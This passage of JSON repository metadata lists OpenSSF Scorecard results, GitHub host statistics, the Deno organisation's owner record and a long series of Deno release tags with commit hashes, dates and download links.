pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://c